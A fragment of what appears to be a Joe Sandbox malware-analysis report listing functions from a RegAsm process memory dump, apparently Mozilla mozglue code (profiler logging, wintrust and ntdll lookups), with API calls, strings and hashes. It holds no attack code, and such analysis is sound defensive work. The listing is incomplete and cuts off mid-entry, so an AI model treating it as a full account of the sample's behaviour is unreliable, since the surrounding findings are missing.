                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                        • String ID: [I %d/%d] WriteProfileToJSONWriter
                                                        • API String ID: 2491745604-3904374701
                                                        • Opcode ID: 13309d005417d3016f9a9e32eddb54b01cfd5b594d2ed2ab3830f0192628fcd3
                                                        • Instruction ID: 52933beb08229e940a88cdedf10371fffb7107decb83b30eb4b45a708fdc4b2a
                                                        • Opcode Fuzzy Hash: 13309d005417d3016f9a9e32eddb54b01cfd5b594d2ed2ab3830f0192628fcd3
                                                        • Instruction Fuzzy Hash: DE31F2B1B047009BC700EF6984553AAFBE5AFDA20CF15852DE8995BB41DF70DA09C7D2
                                                        Function 6C0FF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C0FF480
                                                          • Part of subcall function 6C0CF100: LoadLibraryW.KERNEL32(shell32,?,6C13D020), ref: 6C0CF122
                                                          • Part of subcall function 6C0CF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C0CF132
                                                        • CloseHandle.KERNEL32(00000000), ref: 6C0FF555
                                                          • Part of subcall function 6C0D14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C0D1248,6C0D1248,?), ref: 6C0D14C9
                                                          • Part of subcall function 6C0D14B0: memcpy.VCRUNTIME140(?,6C0D1248,00000000,?,6C0D1248,?), ref: 6C0D14EF
                                                          • Part of subcall function 6C0CEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C0CEEE3
                                                        • CreateFileW.KERNEL32 ref: 6C0FF4FD
                                                        • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C0FF523
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                        • String ID: \oleacc.dll
                                                        • API String ID: 2595878907-3839883404
                                                        • Opcode ID: a6643ddd531a01f6cf8f59e7beba515dacbb0e4d3215f89d442fb64f99bb5cea
                                                        • Instruction ID: e7d1e4ac92cf86e59c39533d08cff1e79f19c5744875eeaf6c57859b1f7812f4
                                                        • Opcode Fuzzy Hash: a6643ddd531a01f6cf8f59e7beba515dacbb0e4d3215f89d442fb64f99bb5cea
                                                        • Instruction Fuzzy Hash: 5441C9706087109FD721DF68C844B9FB7F8AF45718F504A1CFAA493650EB74E589CB92
                                                        Function 6C100210 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C100222
                                                        • moz_xmalloc.MOZGLUE(0000000C), ref: 6C100231
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C10028B
                                                        • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6C1002F7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
                                                        • String ID: @
                                                        • API String ID: 2782572024-2766056989
                                                        • Opcode ID: ea0efba92ab25dc1c4f7636c8a69d87e424f3627de5b53eccf99298cab7721f5
                                                        • Instruction ID: 4e526aba7f540f0f7e5455a0b56620edc9ab00a2912f1cfad001f6bb44de7cf0
                                                        • Opcode Fuzzy Hash: ea0efba92ab25dc1c4f7636c8a69d87e424f3627de5b53eccf99298cab7721f5
                                                        • Instruction Fuzzy Hash: 89319CB1B006518FEB54DF58C880B2AB7F1EF54318B29852DD95AEBB41DB31ED01CB81
                                                        Function 6C10E020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
                                                          • Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10E047
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10E04F
                                                          • Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
                                                          • Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C10E09C
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C10E0B0
                                                        Strings
                                                        • [I %d/%d] profiler_get_profile, xrefs: 6C10E057
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                        • String ID: [I %d/%d] profiler_get_profile
                                                        • API String ID: 1832963901-4276087706
                                                        • Opcode ID: 26986f44875605b82762470f1eeb79a5dd1551d525148a9cf6cf28d26fad1291
                                                        • Instruction ID: 784e90ef7bee619666923277751b909e8e41a01f296842f469d037ca9156b22d
                                                        • Opcode Fuzzy Hash: 26986f44875605b82762470f1eeb79a5dd1551d525148a9cf6cf28d26fad1291
                                                        • Instruction Fuzzy Hash: F721B074B011088FDF00EF65D868AAEBBB5AF9920CF544024ED4A97740DF31EA09CBA1
                                                        Function 6C1274A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetLastError.KERNEL32(00000000), ref: 6C127526
                                                        • __Init_thread_footer.LIBCMT ref: 6C127566
                                                        • __Init_thread_footer.LIBCMT ref: 6C127597
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Init_thread_footer$ErrorLast
                                                        • String ID: UnmapViewOfFile2$kernel32.dll
                                                        • API String ID: 3217676052-1401603581
                                                        • Opcode ID: b15012a4314a41fff666871e01c5908c68aea9ae3bd94bb841b84f7eb84eb96a
                                                        • Instruction ID: 92393385184976a028b0e51d8b4ed348a961e8858dd7f4bf8afe605aabb69684
                                                        • Opcode Fuzzy Hash: b15012a4314a41fff666871e01c5908c68aea9ae3bd94bb841b84f7eb84eb96a
                                                        • Instruction Fuzzy Hash: 07212539700541E7DB149FE9C819F4B73B5EB8632EF11852AD82147B40C72CA882CAD1
                                                        Function 6C12A7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(6C14F770,-00000001,?,6C13E330,?,6C0EBDF7), ref: 6C12A7AF
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C0EBDF7), ref: 6C12A7C2
                                                        • moz_xmalloc.MOZGLUE(00000018,?,6C0EBDF7), ref: 6C12A7E4
                                                        • LeaveCriticalSection.KERNEL32(6C14F770), ref: 6C12A80A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                        • String ID: accelerator.dll
                                                        • API String ID: 2442272132-2426294810
                                                        • Opcode ID: 390cf76f7565fea532b832d60156ce5b07ea34df5a73a98accfa951bd355d792
                                                        • Instruction ID: 4cf0e0fd37a7086644e3e39f5e4ac84dc24df967fa1224388165b25116e283e0
                                                        • Opcode Fuzzy Hash: 390cf76f7565fea532b832d60156ce5b07ea34df5a73a98accfa951bd355d792
                                                        • Instruction Fuzzy Hash: 1C01ADB56003049FEB04DF99D884D15BBF8FB8A32A705C06AE9198B701DB75A800CBA0
                                                        Function 6C0CF0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(ole32,?,6C0CEE51,?), ref: 6C0CF0B2
                                                        • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C0CF0C2
                                                        Strings
                                                        • ole32, xrefs: 6C0CF0AD
                                                        • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C0CF0DC
                                                        • Could not find CoTaskMemFree, xrefs: 6C0CF0E3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                        • API String ID: 2574300362-1578401391
                                                        • Opcode ID: 772861e08c210320d111d4686aafb22be085dc011b1b6217c527452d1d83537e
                                                        • Instruction ID: d851baa00caeb78c1fdb244774dfcab48e33b1edcb38384b8d17a5636df10c46
                                                        • Opcode Fuzzy Hash: 772861e08c210320d111d4686aafb22be085dc011b1b6217c527452d1d83537e
                                                        • Instruction Fuzzy Hash: 46E04FB07456019BAF14AAA6981CF2E3BFD6B52A4D374C42DE522D1F40EA30D4109663
                                                        Function 6C100080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0D7204), ref: 6C100088
                                                        • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C1000A7
                                                        • FreeLibrary.KERNEL32(?,6C0D7204), ref: 6C1000BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                        • API String ID: 145871493-3385133079
                                                        • Opcode ID: eb2c31ae08aa428615ea71888332adab87834487c7b7304cb973698174758321
                                                        • Instruction ID: d7e7fa8598b89efa0ec72dfd81172213f4179e53ed3ef14f7c17616c14ca5063
                                                        • Opcode Fuzzy Hash: eb2c31ae08aa428615ea71888332adab87834487c7b7304cb973698174758321
                                                        • Instruction Fuzzy Hash: 3EE09274745B069BEF10BF66D808B057AF8A75B38DF50C016E924D6750DBB5C020AB21
                                                        Function 6C1000D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0D7235), ref: 6C1000D8
                                                        • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C1000F7
                                                        • FreeLibrary.KERNEL32(?,6C0D7235), ref: 6C10010E
                                                        Strings
                                                        • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C1000F1
                                                        • wintrust.dll, xrefs: 6C1000D3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                        • API String ID: 145871493-2559046807
                                                        • Opcode ID: 25817198255ba186b325bb1c94e9b846bc7a40c83c208ad4c960b43c4a6ed533
                                                        • Instruction ID: 91b2973e5a675992968eb6c3017e75269a89a3ada40312e84c50feda94b1b6a4
                                                        • Opcode Fuzzy Hash: 25817198255ba186b325bb1c94e9b846bc7a40c83c208ad4c960b43c4a6ed533
                                                        • Instruction Fuzzy Hash: 28E0B67474570B9BEF00BF66C909F267AF9A74724DF60C015A96A95B41DBB4C060EB10
                                                        Function 6C100120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0D7297), ref: 6C100128
                                                        • GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C100147
                                                        • FreeLibrary.KERNEL32(?,6C0D7297), ref: 6C10015E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
                                                        • API String ID: 145871493-1536241729
                                                        • Opcode ID: 5d4b05d7aec57d2a0164b53c0b74fdbb95837d92171c62451d9a01792bd34a3d
                                                        • Instruction ID: 5bb6b6c8bf9afedc7f9c2259be0fe1cf8c777d4c784e49af5e45ba6bd2e2ae04
                                                        • Opcode Fuzzy Hash: 5d4b05d7aec57d2a0164b53c0b74fdbb95837d92171c62451d9a01792bd34a3d
                                                        • Instruction Fuzzy Hash: F3E01A707056469BEF00BF2AC80CB067AF8A75330DF50C015A925DA700DB71C024AB50
                                                        Function 6C100170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0D7308), ref: 6C100178
                                                        • GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C100197
                                                        • FreeLibrary.KERNEL32(?,6C0D7308), ref: 6C1001AE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: CryptCATCatalogInfoFromContext$wintrust.dll
                                                        • API String ID: 145871493-3354427110
                                                        • Opcode ID: 962c18d26f4f089e2d5e319c0395d104c7785c30259915018bf7c5a485989e08
                                                        • Instruction ID: 7c8eb86e1f8b5171e31ccae9041c69d6886b1c97557a33f30d55bfaf20950ff2
                                                        • Opcode Fuzzy Hash: 962c18d26f4f089e2d5e319c0395d104c7785c30259915018bf7c5a485989e08
                                                        • Instruction Fuzzy Hash: F8E01A707816869BEF007F25C908B067BF8B74324DF148056E9A595740DB74C0A0AA20
                                                        Function 6C1001C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0D7266), ref: 6C1001C8
                                                        • GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6C1001E7
                                                        • FreeLibrary.KERNEL32(?,6C0D7266), ref: 6C1001FE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: CryptCATAdminReleaseContext$wintrust.dll
                                                        • API String ID: 145871493-1489773717
                                                        • Opcode ID: 4ed711e8aa1f40f3899b5d5e0818a94fadb421a0358176dd9629fc53b4cb70cc
                                                        • Instruction ID: b85f2af5eef1f69442bf7217a9e6c70c4cf573f57f9467f66ea1c937adf35ce3
                                                        • Opcode Fuzzy Hash: 4ed711e8aa1f40f3899b5d5e0818a94fadb421a0358176dd9629fc53b4cb70cc
                                                        • Instruction Fuzzy Hash: A6E09A747857869BEF00BF668808B167AF8AB6735DF50C419E925D9B81DF74C020AB10
                                                        Function 6C12C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C12C0E9), ref: 6C12C418
                                                        • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C12C437
                                                        • FreeLibrary.KERNEL32(?,6C12C0E9), ref: 6C12C44C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: NtQueryVirtualMemory$ntdll.dll
                                                        • API String ID: 145871493-2623246514
                                                        • Opcode ID: 7718a1dc52bf1d4197986ecfccdfe98c8223e57e986a5490a108498244d1508a
                                                        • Instruction ID: c74e552542960d546cb92c3ec9c6cfe58520b426e9202d35fc27bbe79d5a6887
                                                        • Opcode Fuzzy Hash: 7718a1dc52bf1d4197986ecfccdfe98c8223e57e986a5490a108498244d1508a
                                                        • Instruction Fuzzy Hash: 7BE0B6746057029BEF007FB6DD18B167BF8A75624CF00D116AA28A9B01EBB4C030AB50
                                                        Function 6C1275B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C12748B,?), ref: 6C1275B8
                                                        • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C1275D7
                                                        • FreeLibrary.KERNEL32(?,6C12748B,?), ref: 6C1275EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: RtlNtStatusToDosError$ntdll.dll
                                                        • API String ID: 145871493-3641475894
                                                        • Opcode ID: a8defc248a3521328d92aeeed919304fa426b8c6a76ff468aed1d0a4e8e735a7
                                                        • Instruction ID: eb4dc3a45ff9431c330416eb04f9d007999463af719ddc83f45fff5eefd237b4
                                                        • Opcode Fuzzy Hash: a8defc248a3521328d92aeeed919304fa426b8c6a76ff468aed1d0a4e8e735a7
                                                        • Instruction Fuzzy Hash: 72E0B675605701ABEF007FA6C849B06BEF8EB4721EF10D026A925E1701EBBC8091EF51
                                                        Function 6C127600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C127592), ref: 6C127608
                                                        • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C127627
                                                        • FreeLibrary.KERNEL32(?,6C127592), ref: 6C12763C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: NtUnmapViewOfSection$ntdll.dll
                                                        • API String ID: 145871493-1050664331
                                                        • Opcode ID: 4bd39612cb4613f7c87ede92cd7b330e0323c200b01b18c7f7738caedd83abcc
                                                        • Instruction ID: 56108ea7e2957fe6727704ab08ca78dba20cbe12cf179e85002d4ec415a2aaa5
                                                        • Opcode Fuzzy Hash: 4bd39612cb4613f7c87ede92cd7b330e0323c200b01b18c7f7738caedd83abcc
                                                        • Instruction Fuzzy Hash: 29E0B6B8605701ABEF007FA6C808B067EB9E76A35EF01C116E929E1701E7BC8001EF64
                                                        Function 6C12C1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6C12C1DE,?,00000000,?,00000000,?,6C0D779F), ref: 6C12C1F8
                                                        • GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C12C217
                                                        • FreeLibrary.KERNEL32(?,6C12C1DE,?,00000000,?,00000000,?,6C0D779F), ref: 6C12C22C
                                                        Strings
